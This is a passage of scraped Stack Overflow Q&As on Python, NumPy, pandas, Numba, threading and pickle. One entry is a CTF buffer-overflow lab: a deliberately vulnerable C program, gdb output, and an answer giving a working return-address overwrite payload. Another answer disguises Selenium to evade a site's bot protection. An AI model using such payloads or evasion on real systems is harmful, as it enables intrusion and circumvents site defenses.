magic, and that's great: you only need one cast in the implementation to make the interface (how others interact with your class) statically correct. Here it is: @dataclass class Database: records: Mapping[str, Sequence[Table]] def filter( self, table: type[_Table], _filter: Callable[[_Table], bool] ) -> Iterable[_Table]: yield from ( i for i in cast("Sequence[_Table]", self.records[table.get_name()]) if _filter(i) ) Note that I cast the whole sequence. 
It's the only invariant you have to verify yourself (namely that a key of table.get_name() always corresponds to instances of that table - please fix the naming, tables are not rows nor records, it's mind-blowing), the rest is on the type checker's shoulders. And yes, this supports inline lambdas as you wanted: db = Database(records) print( *db.filter(Ducks, _filter=lambda t: t.age < 100), sep="\n" ) And here's a playground with your complete example modified for this answer. | 1 | 2 |
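For completeness — the answer's `filter` relies on the `_Table` type variable that the question had commented out. A condensed, self-contained sketch of the whole arrangement (plain class bodies instead of the question's extra fields) might look like this:

```python
from collections.abc import Callable, Iterable, Mapping, Sequence
from dataclasses import dataclass
from typing import TypeVar, cast

_Table = TypeVar("_Table", bound="Table")  # accepts Table or any of its subclasses


@dataclass
class Table:
    @classmethod
    def get_name(cls) -> str:
        return cls.__name__.lower()


@dataclass
class Database:
    records: Mapping[str, Sequence[Table]]

    def filter(
        self, table: type[_Table], _filter: Callable[[_Table], bool]
    ) -> Iterable[_Table]:
        # the single cast: we promise records[table.get_name()] holds that subclass
        rows = cast("Sequence[_Table]", self.records[table.get_name()])
        yield from (row for row in rows if _filter(row))
```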
79,571,010 | 2025-4-12 | https://stackoverflow.com/questions/79571010/how-to-create-a-numpy-structured-array-with-different-field-values-using-full-li | I would like to create a NumPy structured array b with the same shape as a and (-1, 1) values, for example: import numpy as np Point = [('x', 'i4'), ('y', 'i4')] a = np.zeros((4, 4), dtype='u1') b = np.full_like(a, fill_value=(-1, 1), dtype=Point) # fails b = np.full_like(a, -1, dtype=Point) # works Using full_like() works with the same value for all fields, but fails with different values, producing this error: multiarray.copyto(res, fill_value, casting='unsafe') ValueError: could not broadcast input array from shape (2,) into shape (4,4) . Is there a solution other than explicitly assigning (-1, 1) to each element in a loop? | Convert the fill value into an array with the Point dtype as well import numpy as np Point = [('x', 'i4'), ('y', 'i4')] a = np.zeros((4, 4), dtype='u1') b = np.full_like(a, fill_value=np.array((-1, 1), dtype=Point), dtype=Point) # works Alternatively, if you don't need a, just create the array directly with your desired shape import numpy as np Point = [('x', 'i4'), ('y', 'i4')] b = np.full((4, 4), np.array((-1, 1), dtype=Point)) | 2 | 5 |
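An equivalent alternative in case per-field values read more clearly: build the structured array first and assign each field separately (a small sketch):

```python
import numpy as np

Point = [('x', 'i4'), ('y', 'i4')]

b = np.zeros((4, 4), dtype=Point)
b['x'] = -1   # broadcast -1 into every 'x' field
b['y'] = 1    # broadcast  1 into every 'y' field
```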
79,570,284 | 2025-4-12 | https://stackoverflow.com/questions/79570284/how-to-locate-and-overwrite-eip-in-a-buffer-overflow-lab-using-gdb-14-2 | I have the following code as part of a buffer overflow CTF challenge: #define _GNU_SOURCE #include <stdio.h> #include <string.h> #include <unistd.h> int my_gets(char *buf) { int i = 0; char c; while (read(0, &c, 1) > 0 && c != '\n') { buf[i++] = c; } buf[i] = '\0'; return i; } int main() { int cookie; char buf[16]; printf("&buf: %p, &cookie: %p\n", buf, &cookie); my_gets(buf); if (cookie == 0x000D0A00) { printf("%s","You win!\n"); } return 0; } . Normally, the goal is to overwrite the cookie variable to reach the value 0x000D0A00, but this value contains special characters that make direct injection difficult. So instead, my goal is to jump directly to address 0x08049232 in order to print "You win!" without needing to modify the cookie. I started by injecting 16 'A' characters to figure out the stack frame layout.. I compiled it using: gcc -m32 -z execstack -fno-stack-protector -no-pie -o stack4 stack4.c (gdb) break *0x08049232 Breakpoint 1 at 0x8049232 (gdb) run < <(python3 -c 'print("A"*16)') Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". &buf: 0xffffcfac, &cookie: 0xffffcfbc Breakpoint 1, 0x08049232 in main () (gdb) x/wc $ebp+4 0xffffcfcc: 67 'C' (gdb) x/wx $ebp+4 0xffffcfcc: 0xf7d8bd43 (gdb) info frame Stack level 0, frame at 0xffffcfe0: eip = 0x8049232 in main; saved eip = 0xf7d8bd43 Arglist at 0xffffcfc8, args: Locals at 0xffffcfc8, Previous frame's sp is 0xffffcfe0 Saved registers: ebx at 0xffffcfc4, ebp at 0xffffcfc8, eip at 0xffffcfdc (gdb) .Based on that, I crafted a payload to overwrite the value at ebp+4, since I assumed that’s where the saved return address (EIP) is stored. I intentionally avoided touching $ebp, $ebp-4, and $ebp-8 because I wasn’t sure what they were used for. Here’s the payload I tried: (gdb) run < <(python -c 'import sys; sys.stdout.buffer.write(b"A"*20 + b"\xe0\xcf\xff\xff" + b"\x14\xce\xf9\xf7" + b"\x00\x00\x00\x00" + b"\x39\x92\x04\x08")') sys.stdout.buffer.write(b"A"*20 + b"\xe0\xcf\xff\xff" + b"\x14\xce\xf9\xf7" + b"\x00\x00\x00\x00" + b"\x39\x92\x04\x08")') [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 
&buf: 0xffffcfac, &cookie: 0xffffcfbc Breakpoint 1, 0x08049232 in main () (gdb) x/wx $ebp+4 0xffffcfcc: 0x08049239 (gdb) x/wx $ebp 0xffffcfc8: 0x00000000 (gdb) x/wx $ebp-4 0xffffcfc4: 0xf7f9ce14 (gdb) x/wx $ebp-8 0xffffcfc0: 0xffffcfe0 (gdb) x/wx $ebp-12 0xffffcfbc: 0x41414141 (gdb) x/wx $ebp-28 0xffffcfac: 0x41414141 (gdb) info frame Stack level 0, frame at 0xffffcfe0: eip = 0x8049232 in main; saved eip = 0xf7d8bd43 Arglist at 0xffffcfc8, args: Locals at 0xffffcfc8, Previous frame's sp is 0xffffcfe0 Saved registers: ebx at 0xffffcfc4, ebp at 0xffffcfc8, eip at 0xffffcfdc (gdb) disas mian: (gdb) disas main Dump of assembler code for function main: 0x080491e9 <+0>: lea 0x4(%esp),%ecx 0x080491ed <+4>: and $0xfffffff0,%esp 0x080491f0 <+7>: push -0x4(%ecx) 0x080491f3 <+10>: push %ebp 0x080491f4 <+11>: mov %esp,%ebp 0x080491f6 <+13>: push %ebx 0x080491f7 <+14>: push %ecx 0x080491f8 <+15>: sub $0x20,%esp 0x080491fb <+18>: call 0x80490c0 <__x86.get_pc_thunk.bx> 0x08049200 <+23>: add $0x2df4,%ebx 0x08049206 <+29>: sub $0x4,%esp 0x08049209 <+32>: lea -0xc(%ebp),%eax 0x0804920c <+35>: push %eax 0x0804920d <+36>: lea -0x1c(%ebp),%eax 0x08049210 <+39>: push %eax 0x08049211 <+40>: lea -0x1fec(%ebx),%eax 0x08049217 <+46>: push %eax 0x08049218 <+47>: call 0x8049050 <printf@plt> 0x0804921d <+52>: add $0x10,%esp 0x08049220 <+55>: sub $0xc,%esp 0x08049223 <+58>: lea -0x1c(%ebp),%eax 0x08049226 <+61>: push %eax 0x08049227 <+62>: call 0x8049186 <my_gets> 0x0804922c <+67>: add $0x10,%esp 0x0804922f <+70>: mov -0xc(%ebp),%eax 0x08049232 <+73>: cmp $0xd0a00,%eax 0x08049237 <+78>: jne 0x804924b <main+98> 0x08049239 <+80>: sub $0xc,%esp 0x0804923c <+83>: lea -0x1fd5(%ebx),%eax 0x08049242 <+89>: push %eax 0x08049243 <+90>: call 0x8049060 <puts@plt> 0x08049248 <+95>: add $0x10,%esp 0x0804924b <+98>: mov $0x0,%eax 0x08049250 <+103>: lea -0x8(%ebp),%esp 0x08049253 <+106>: pop %ecx 0x08049254 <+107>: pop %ebx 0x08049255 <+108>: pop %ebp 0x08049256 <+109>: lea -0x4(%ecx),%esp 0x08049259 <+112>: ret End of assembler dump. (gdb) However, "You win!" is not printed, and I’m unsure where I went wrong in the exploit. Could someone help me figure out what I’m missing? | Your main has non-standard stack layout and epilogue: 0x08049253 <+106>: pop %ecx 0x08049254 <+107>: pop %ebx 0x08049255 <+108>: pop %ebp 0x08049256 <+109>: lea -0x4(%ecx),%esp 0x08049259 <+112>: ret If you simply try to overflow the buffer until you overwrite the return address you overwrite the saved ecx as well which means esp will no longer point to the location where you have written the return address. Since the code helpfully leaks the address of buf you can use that to construct a payload that sets the saved copy of ecx to point there. You will need to account for the -4 offset. For example a sample run on my system produced: &buf: 0xffffd9bc, &cookie: 0xffffd9cc Therefore my payload was: print(b"\x39\x92\x04\x08AAAAAAAAAAAAAAAA\xc0\xd9\xff\xff") First the address to jump to, then 16 bytes of padding and finally &buf + 4. This correctly jumps to the intended address. However, you have compiled with -no-pie but still have PIC enabled which uses ebx to address constants. Since ebx has also been popped from the stack it is no longer valid and will result in a crash. I don't see an obvious way to fix ebx. I suspect the challenge was originally meant to be standard position dependent code so consider compiling with -fno-pic. 
Note: if &buf + 4 happens to include a 0x0a byte you can just re-run it until stack randomization gives you an address that does not :) Alternatively, if the 0x0a is one of the two least significant bytes you can extend your payload until you reach the next usable address. | 1 | 1 |
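A small Python helper expressing the answer's payload with `struct.pack`, so the little-endian addresses don't have to be hand-encoded; the two concrete addresses come from the answer's example run and must be replaced with the values your binary prints (they change between runs because of stack randomization):

```python
import struct
import sys

win_branch = 0x08049239   # instruction right after the cookie comparison (from disas main)
buf_addr   = 0xffffd9bc   # "&buf" as printed by the program at startup

payload  = struct.pack("<I", win_branch)    # lands in buf[0:4] and becomes the return address
payload += b"A" * 16                        # padding up to the saved ecx slot
payload += struct.pack("<I", buf_addr + 4)  # saved ecx: 'lea -0x4(%ecx),%esp' then points esp at buf

sys.stdout.buffer.write(payload + b"\n")
```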
79,569,269 | 2025-4-11 | https://stackoverflow.com/questions/79569269/seeking-advice-on-efficient-pandas-operations-for-conditional-summing | I am a newbie to Python and pandas and would appreciate any help I can get. I have the below code and would like to know whether there is a more efficient way to write it to improve performance. I tried using cumsum but it does not give me the same output. Context: I need to calculate the total vesting_value_CAD for each trancheID by summing all trancheIDs having the same employeeID, groupName, and vesting_year with agreementDate <= the current trancheID's agreementDate, excluding the current row. Code: import pandas as pd from datetime import datetime # Create the dataframe data = { 'employeeID': [2, 2, 2, 2, 2, 2, 2], 'groupName': ['A', 'A', 'A', 'A', 'A', 'B', 'A'], 'agreementID': [7, 7, 1, 1, 8, 9, 6], 'agreementDate': ['3/1/2025', '3/1/2025', '4/1/2025', '3/1/2025', '2/1/2025', '3/1/2025', '3/1/2025'], 'trancheID': [28, 29, 26, 27, 30, 31, 32], 'vesting_year': [2025, 2026, 2026, 2027, 2026, 2026, 2026], 'vesting_value_CAD': [200, 300, 400, 500, 50, 30, 40] } df = pd.DataFrame(data) # Convert agreementDate to datetime df['agreementDate'] = pd.to_datetime(df['agreementDate'], format='%m/%d/%Y') # Function to calculate total vesting_value_CAD for each trancheID def calculate_total_vesting_value(row): # Filter the dataframe based on the conditions filtered_df = df[(df['employeeID'] == row['employeeID']) & (df['groupName'] == row['groupName']) & (df['vesting_year'] == row['vesting_year']) & (df['agreementDate'] <= row['agreementDate']) & (df['trancheID'] != row['trancheID'])] # Calculate the sum of vesting_value_CAD total_vesting_value = filtered_df['vesting_value_CAD'].sum() return total_vesting_value # Apply the function df['total_vesting_value_CAD'] = df.apply(calculate_total_vesting_value, axis=1) print(df) | Here's one approach: cols = ['employeeID', 'groupName', 'vesting_year', 'agreementDate'] out = ( df.merge( df.groupby(cols)['vesting_value_CAD'].sum() .groupby(cols[:-1]).cumsum() .rename('total_vesting_value_CAD'), on=cols ) .assign( total_vesting_value_CAD=lambda x: x['total_vesting_value_CAD'] - x['vesting_value_CAD'] ) ) Output: employeeID groupName agreementID agreementDate trancheID vesting_year \ 0 2 A 7 2025-03-01 28 2025 1 2 A 7 2025-03-01 29 2026 2 2 A 1 2025-04-01 26 2026 3 2 A 1 2025-03-01 27 2027 4 2 A 8 2025-02-01 30 2026 5 2 B 9 2025-03-01 31 2026 6 2 A 6 2025-03-01 32 2026 vesting_value_CAD total_vesting_value_CAD 0 200 0 1 300 90 2 400 390 3 500 0 4 50 0 5 30 0 6 40 350 Explanation / Intermediates Start with .groupby + groupby.sum to get the sum per date: cols = ['employeeID', 'groupName', 'vesting_year', 'agreementDate'] employeeID groupName vesting_year agreementDate 2 A 2025 2025-03-01 200 2026 2025-02-01 50 2025-03-01 340 2025-04-01 400 2027 2025-03-01 500 B 2026 2025-03-01 30 Name: vesting_value_CAD, dtype: int64 Now, chain a groupby on the same columns (now: index levels) except 'agreementDate' (cols[:-1]) + groupby.cumsum + Series.rename: (df.groupby(cols)['vesting_value_CAD'].sum() .groupby(cols[:-1]).cumsum() .rename('total_vesting_value_CAD')) employeeID groupName vesting_year agreementDate 2 A 2025 2025-03-01 200 2026 2025-02-01 50 2025-03-01 390 2025-04-01 790 2027 2025-03-01 500 B 2026 2025-03-01 30 Name: total_vesting_value_CAD, dtype: int64 Use .merge on cols to add to the original df and use .assign to correct column 'total_vesting_value_CAD' by subtracting column 'vesting_value_CAD'. 
df.merge(...).loc[:, ['vesting_value_CAD', 'total_vesting_value_CAD']] vesting_value_CAD total_vesting_value_CAD 0 200 200 # 200 - 200 = 0 1 300 390 # 390 - 300 = 90 2 400 790 # 790 - 400 = 390 3 500 500 # etc. 4 50 50 5 30 30 6 40 390 | 4 | 2 |
79,570,507 | 2025-4-12 | https://stackoverflow.com/questions/79570507/selenium-doesnt-open-website-with-provided-url-url-is-valid | I try to open whois EURID website with no luck. Selenium opens browser (tried with Chrome and FF), but when I try to open particular URL (http://whois.eurid.eu/): nothing opens, I got blank page only. I have driver set by this function: def set_driver() -> WebDriver: service = Service() if cfg["browser"]["browser_name"].strip().lower() == "firefox": options = webdriver.FirefoxOptions() driver = webdriver.Firefox(service=service, options=options) elif cfg["browser"]["browser_name"].strip().lower() == "edge": options = webdriver.EdgeOptions() driver = webdriver.Edge(service=service, options=options) else: options = webdriver.ChromeOptions() driver = webdriver.Chrome(service=service, options=options) return driver Using driver (set above) I try to open webiste and scrape some data (information about domain): domain_name = "ddddddd.eu" # any name ending with '.eu' URL = f"https://whois.eurid.eu/en/search/?domain={domain_name}" drv = set_driver() drv.get(URL) time.sleep(5) I think this website is currently somehow protected, as I have had no problems with opening it before. | Cloudflare Protection or User Agent Detection or JavaScript might cause the issue. Please find below an enhanced solution for your consideration: from selenium import webdriver from selenium.webdriver.chrome.service import Service from selenium.webdriver.chrome.options import Options from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC import time def get_eurid_whois(domain): chrome_options = Options() chrome_options.add_argument("--start-maximized") chrome_options.add_argument("--disable-blink-features=AutomationControlled") chrome_options.add_argument("--disable-infobars") chrome_options.add_argument("--disable-extensions") chrome_options.add_argument("--disable-popup-blocking") chrome_options.add_argument("user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) " "AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/122.0.0.0 Safari/537.36") driver = webdriver.Chrome(service=Service(), options=chrome_options) try: url = f"https://whois.eurid.eu/en/search/?domain={domain}" driver.get(url) time.sleep(3) try: WebDriverWait(driver, 15).until( EC.presence_of_element_located((By.CSS_SELECTOR, ".btn")) ) except: print("Page didn't load properly. Check if blocked by CAPTCHA.") return None try: register_button = driver.find_element(By.XPATH, "//a[contains(text(), 'Register now')]") print("Domain is available. 'Register now' button found.") return "Available" except: print("Domain is not available. 'Register now' button not found.") whois_data = driver.find_element(By.CSS_SELECTOR, ".btn").text return whois_data finally: driver.quit() print(get_eurid_whois("ddddddd.eu")) | 1 | 2 |
79,568,828 | 2025-4-11 | https://stackoverflow.com/questions/79568828/image-matching-fails-with-low-confidence-using-pyautogui-and-opencv | I'm working on automating GUI testing using OpenCV and PyAutoGui. I tried both pyautogui.locateOnScreen() and cv2.matchTemplate() to detect UI elements by matching a reference image inside a screen region. The reference image is visibly present inside the screenshot (confirmed manually), but both approaches either fail or return very low confidence (~0.21), and no click is triggered. The image path is passed via sys.argv. if __name__ == "__main__": if len(sys.argv) < 3: print("[ERROR] Usage: python OCR.py <word> <confidence>") else: word = sys.argv[1] reference_image = sys.argv[2] result = find_and_click_text(word, reference_image) print(result) Here's what works: If the path is hardcoded inside the .py script → locateOnScreen() works perfectly. If I pass the image path via sys.argv, and print it → it looks identical. Image.open(reference_image) works — file exists and loads fine. Here's what fails: pyautogui.locateOnScreen(reference_image) → fails silently or gives low confidence (~0.2) Even if I pass the loaded image object (Image.open(path)) to locateOnScreen() → it fails OpenCV's cv2.matchTemplate() also gives low confidence (~0.21) even though the reference image clearly appears in the screenshot. .py File Output: [DEBUG] Reference image path received: C:\PFE\Test_Automation\CubeMX\PA6_reference.png [DEBUG] sys.argv: ['OCR.py', 'GPIOOutput', 'C:\\PFE\\Test_Automation\\CubeMX\\PA6_reference.png'] [DEBUG] File exists at: C:/PFE/Test_Automation/CubeMX/PA6_reference.png [ERROR] Traceback (most recent call last): File "C:\Python312\Lib\site-packages\pyautogui\__init__.py", line 172, in wrapper return wrappedFunction(*args, **kwargs) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Python312\Lib\site-packages\pyautogui\__init__.py", line 210, in locateOnScreen return pyscreeze.locateOnScreen(*args, **kwargs) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Python312\Lib\site-packages\pyscreeze\__init__.py", line 405, in locateOnScreen retVal = locate(image, screenshotIm, **kwargs) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Python312\Lib\site-packages\pyscreeze\__init__.py", line 383, in locate points = tuple(locateAll(needleImage, haystackImage, **kwargs)) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Python312\Lib\site-packages\pyscreeze\__init__.py", line 257, in _locateAll_opencv raise ImageNotFoundException('Could not locate the image (highest confidence = %.3f)' % result.max()) pyscreeze.ImageNotFoundException: Could not locate the image (highest confidence = 0.274) What I’ve Confirmed: The problem isn't solved even when I limit the search area using pyautogui.screenshot(region=(...)) ImageChops.difference() confirms the reference and cropped screen area are pixel-perfect The reference image isn't accessed after running the script. Screenshots: The first image is my screen and the second is the reference image. Thanks in advance — I’m happy to share any additional information (code + screenshots) if needed. | Here is your template overlaid side by side with the instance I think you want to locate. See how the image content is not the same size? That is the problem. That can't match. It has to be the same size/scale. Pick the template correctly. Then it will work. | 2 | 1 |
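If re-capturing the reference image at exactly the right size is impractical, a common workaround is to brute-force a handful of scales with OpenCV before matching — a sketch (this is plain OpenCV, not part of the PyAutoGUI API), assuming both images are already grayscale:

```python
import cv2
import numpy as np

def locate_multiscale(screenshot_gray, template_gray, scales=np.linspace(0.5, 1.5, 21)):
    """Try several template scales and keep the best normalized-correlation match."""
    best = (0.0, None, 1.0)  # (score, top-left corner, scale)
    for s in scales:
        resized = cv2.resize(template_gray, None, fx=s, fy=s, interpolation=cv2.INTER_AREA)
        if resized.shape[0] > screenshot_gray.shape[0] or resized.shape[1] > screenshot_gray.shape[1]:
            continue  # template can't be larger than the search image
        result = cv2.matchTemplate(screenshot_gray, resized, cv2.TM_CCOEFF_NORMED)
        _, max_val, _, max_loc = cv2.minMaxLoc(result)
        if max_val > best[0]:
            best = (max_val, max_loc, s)
    return best  # a score above ~0.8 usually indicates a genuine hit
```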
79,570,437 | 2025-4-12 | https://stackoverflow.com/questions/79570437/what-is-the-most-efficient-way-to-get-length-of-path-from-adjacency-matrix-using | The problem I am solving is optimizing a genetic algorithm for the Traveling Salesman Problem. Calculating the path takes the most time. Here is the current code I am working on: from itertools import pairwise import numpy as np from random import shuffle def get_path_len(adj_mat: np.ndarray, path: np.ndarray) -> float: return sum(adj_mat[i, j] for i, j in pairwise(path)) + adj_mat[path[-1], path[0]] mat = np.random.randint(1, 1000, (100, 100)) path = np.asarray(list(range(100))) shuffle(path) print(get_path_len(mat, path)) | Here is an example of how to use Numba to do that efficiently: import numba as nb # Pre-compile the code for a int32/int64 adj_mat 2D array # and a int64 path 1D array @nb.njit(['(int32[:,:], int64[:])', '(int64[:,:], int64[:])']) def get_path_len(adj_mat, path): s = 0 for i in range(path.size-1): # Assume path contains integers less than min(adj_mat.shape) s += adj_mat[path[i], path[i+1]] return s + adj_mat[path[-1], path[0]] Here is performance results on my i5-9600KF CPU and Numpy 2.1.3: Naive unvectorised code: 28.5 µs Numba code: 0.6 µs | 3 | 3 |
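If pulling in Numba is not an option, the same pairwise lookup can be vectorised in plain NumPy with fancy indexing; this is already much faster than the generator-based sum, though typically still slower than the compiled loop above:

```python
import numpy as np

def get_path_len_np(adj_mat: np.ndarray, path: np.ndarray) -> float:
    # Gather all consecutive edge weights at once, then add the edge that closes the cycle
    return adj_mat[path[:-1], path[1:]].sum() + adj_mat[path[-1], path[0]]
```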
79,570,508 | 2025-4-12 | https://stackoverflow.com/questions/79570508/create-boolean-columns-from-string-column | I have column column1 of type string with values like "some1,some2,some3". I need to create boolean columns based on column1 like: some1, some2, some3. For example, I have the dataframe with one column column1: column1 | -------------------+ "some1,some2,some3"| "some2,some3" | "some1" | "some1,some3" | I need to get the dataframe with three boolean columns: some1 | some2 | some3 | ------+-------+-------+ True | True | True | False | True | True | True | False | False | True | False | True | | You can use str.get_dummies + astype: df['column1'].str.get_dummies(sep=',').astype(bool) Output: some1 some2 some3 0 True True True 1 False True True 2 True False False 3 True False True Data used import pandas as pd data = {'column1': ["some1,some2,some3", "some2,some3", "some1", "some1,some3"]} df = pd.DataFrame(data) | 1 | 4 |
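An equivalent route, shown only as a sketch, splits and explodes the values and then cross-tabulates presence per row; `str.get_dummies` from the answer is usually the shorter option:

```python
import pandas as pd

data = {'column1': ["some1,some2,some3", "some2,some3", "some1", "some1,some3"]}
df = pd.DataFrame(data)

s = df['column1'].str.split(',').explode()
out = pd.crosstab(s.index, s).gt(0)   # True where a row contains the value
```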
79,570,287 | 2025-4-12 | https://stackoverflow.com/questions/79570287/python-3-concurrent-futures-get-thread-number-without-adding-a-function | Currently this code prints, MainThread done at sec 1 MainThread done at sec 1 MainThread done at sec 2 MainThread done at sec 1 MainThread done at sec 0 MainThread done at sec 3 MainThread done at sec 2 MainThread done at sec 5 MainThread done at sec 4 I need it to print MainThread 1 done at sec 1 MainThread 3 done at sec 1 MainThread 2 done at sec 2 MainThread 3 done at sec 1 MainThread 1 done at sec 0 MainThread 2 done at sec 3 MainThread 2 done at sec 2 MainThread 3 done at sec 5 MainThread 1 done at sec 4 How can I do this, by modifying this 1 line of code. print(threading.current_thread().name + ' done at sec ' + str(future.result())) Here is the full code import concurrent.futures import threading import pdb import time import random def Threads2(time_sleep): time.sleep(time_sleep) return time_sleep all_sections = [random.randint(0, 5) for iii in range(10)] test1 = [] with concurrent.futures.ThreadPoolExecutor(max_workers=3, thread_name_prefix="Ok") as executor: working_threads = {executor.submit(Threads2, time_sleep): time_sleep for index, time_sleep in enumerate(all_sections)} for future in concurrent.futures.as_completed(working_threads): print(threading.current_thread().name + ' done at sec ' + str(future.result())) | future doesn't know which thread ran the function, you need to store that yourself. you can wrap the functor in a wrapper that will return whatever you want from the executing thread. import concurrent.futures import threading import pdb import time import random from functools import wraps def wrap_function(func): @wraps(func) def wrapper_functor(*args, **kwargs): return (threading.current_thread().name, threading.current_thread().ident, func(*args, **kwargs)) # calls the wrapped function return wrapper_functor # return a functor that wraps the function def Threads2(time_sleep): time.sleep(time_sleep) return time_sleep all_sections = [random.randint(0, 5) for iii in range(10)] test1 = [] with concurrent.futures.ThreadPoolExecutor( max_workers=3, thread_name_prefix="Ok") as executor: working_threads = { executor.submit(wrap_function(Threads2), time_sleep): time_sleep for index, time_sleep in enumerate(all_sections)} for future in concurrent.futures.as_completed(working_threads): thread_name, thread_id, result = future.result() print(thread_name, thread_id, 'done at sec', str(result)) Ok_0 18532 done at sec 0 Ok_2 12424 done at sec 1 Ok_0 18532 done at sec 3 Ok_2 12424 done at sec 2 Ok_1 19356 done at sec 4 Ok_0 18532 done at sec 4 Ok_1 19356 done at sec 3 Ok_2 12424 done at sec 4 Ok_0 18532 done at sec 3 Ok_1 19356 done at sec 4 if you want just 0,1,2 then you can use thread_name.split('_')[-1] a super compressed form to do this with a lambda (which shouldn't pass a code review) is working_threads = { executor.submit(lambda *args, **kwargs: ( threading.current_thread().name, threading.current_thread().ident, Threads2(*args, **kwargs)), time_sleep): time_sleep for index, time_sleep in enumerate(all_sections)} | 2 | 1 |
79,570,163 | 2025-4-12 | https://stackoverflow.com/questions/79570163/why-do-these-nearly-identical-functions-perform-very-differently | I have written four functions that modify a square 2D array in place, it reflects half of the square array delimited by two sides that meet and the corresponding 45 degree diagonal, to the other half separated by the same diagonal. I have written a function for each of the four possible cases, to reflect product(('upper', 'lower'), ('left', 'right')) to product(('lower', 'upper'), ('right', 'left')). They use Numba to compile Just-In-Time and they are parallelized using numba.prange and are therefore much faster than the methods provided by NumPy: In [2]: sqr = np.random.randint(0, 256, (1000, 1000), dtype=np.uint8) In [3]: %timeit x, y = np.tril_indices(1000); sqr[x, y] = sqr[y, x] 9.16 ms ± 30.9 μs per loop (mean ± std. dev. of 7 runs, 100 loops each) As you can see, the above code takes a very long time to execute. import numpy as np import numba as nb @nb.njit(cache=True, parallel=True, nogil=True) def triangle_flip_LL2UR(arr: np.ndarray) -> None: height, width = arr.shape[:2] if height != width: raise ValueError("argument arr must be a square") for i in nb.prange(height): arr[i, i:] = arr[i:, i] @nb.njit(cache=True, parallel=True, nogil=True) def triangle_flip_UR2LL(arr: np.ndarray) -> None: height, width = arr.shape[:2] if height != width: raise ValueError("argument arr must be a square") for i in nb.prange(height): arr[i:, i] = arr[i, i:] @nb.njit(cache=True, parallel=True, nogil=True) def triangle_flip_LR2UL(arr: np.ndarray) -> None: height, width = arr.shape[:2] if height != width: raise ValueError("argument arr must be a square") last = height - 1 for i in nb.prange(height): arr[i, last - i :: -1] = arr[i:, last - i] @nb.njit(cache=True, parallel=True, nogil=True) def triangle_flip_UL2LR(arr: np.ndarray) -> None: height, width = arr.shape[:2] if height != width: raise ValueError("argument arr must be a square") last = height - 1 for i in nb.prange(height): arr[i:, last - i] = arr[i, last - i :: -1] In [4]: triangle_flip_LL2UR(sqr) In [5]: triangle_flip_UR2LL(sqr) In [6]: triangle_flip_LR2UL(sqr) In [7]: triangle_flip_UL2LR(sqr) In [8]: %timeit triangle_flip_LL2UR(sqr) 194 μs ± 634 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [9]: %timeit triangle_flip_UR2LL(sqr) 488 μs ± 3.26 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) In [10]: %timeit triangle_flip_LR2UL(sqr) 196 μs ± 501 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [11]: %timeit triangle_flip_UL2LR(sqr) 486 μs ± 855 ns per loop (mean ± std. dev. of 7 runs, 1,000 loops each) Why do they have execution times with a significant difference? Two of them take around 200 microseconds to execute, the other two around 500 microseconds, despite the fact that they are almost identical. I have discovered something. triangle_flip_UR2LL(arr) is the same as triangle_flip_LL2UR(sqr.T) and vice versa. Now if I transpose the array before calling the functions, the trend of performance is reversed: In [109]: %timeit triangle_flip_UR2LL(sqr.T) 196 μs ± 1.15 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) In [110]: %timeit triangle_flip_LL2UR(sqr.T) 490 μs ± 1.24 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) Why is this happening? | this is a mixture of false sharing and memory bandwidth bottleneck, removing the parallelization by converting nb.prange -> range you get equal times for all 4 functions. 
The first one is writing a single row at a time, which is contiguous in memory; the second one is writing a column at a time, and that column is not contiguous. The computer doesn't work with bytes, it works with cache lines; a cache line is a contiguous 64 bytes of memory on most systems. When a thread writes to a cache line it marks the entire cache line dirty, and other threads need to refresh their version of that dirty cache line before they read or write the other values in it. This is basically false sharing. In the second version, as each thread is writing a column at a time, it is marking many cache lines dirty at a time, thus stepping over other threads that will try to read from it. Lastly, I need to point out that parallelizing this code introduces race conditions in all versions: you need to have separate arrays for input and output, or have each thread work on a square block at a time instead of an entire row or column. Most optimized implementations of matrix transpose avoid this false sharing by doing exactly that. | 2 | 4 |
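A sketch of that last suggestion: separate input/output arrays processed in square blocks, so writes stay mostly within each thread's own cache lines (the block size is an assumption to tune for your CPU):

```python
import numba as nb
import numpy as np

@nb.njit(cache=True, parallel=True)
def transpose_blocked(src, dst, block=64):
    n = src.shape[0]
    nblocks = (n + block - 1) // block
    for bi in nb.prange(nblocks):        # each thread owns a horizontal band of src
        i0 = bi * block
        i1 = min(i0 + block, n)
        for j0 in range(0, n, block):    # walk that band one square block at a time
            j1 = min(j0 + block, n)
            for i in range(i0, i1):
                for j in range(j0, j1):
                    dst[j, i] = src[i, j]

a = np.random.randint(0, 256, (1000, 1000), dtype=np.uint8)
out = np.empty_like(a)
transpose_blocked(a, out)
```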
79,569,792 | 2025-4-11 | https://stackoverflow.com/questions/79569792/pickle-works-but-fails-pytest | I've created a module persist containing a function obj_pickle which I'm using to pickle various objects in my project. It work fine but it's failing pytest, returning; > pickle.dump(obj, file_handle, protocol=protocol) E AttributeError: Can't pickle local object 'test_object.<locals>.TestObject' Running: python 3.12 pytest Version: 8.3.5 I see that the are similar looking issues tied to multiprocessing but I don't think pytest is exposing that issue. Code below, and many thanks. # lib.persist.py from pathlib import Path import pickle def obj_pickle(obj: object, dir:Path, protocol: int = pickle.HIGHEST_PROTOCOL) -> None: """ Pickle an object to a byte file. """ if not dir.exists(): dir.mkdir(parents=True, exist_ok=True) path = Path(dir, obj.instance_name + '.pkl') with open(path, "wb") as file_handle: pickle.dump(obj, file_handle, protocol=protocol) print(f"{obj.__class__.__name__} object {obj.instance_name} saved to {path}") # tests.test_persist.py from pathlib import Path import pytest from lib.persist import obj_pickle TEST_DIR = 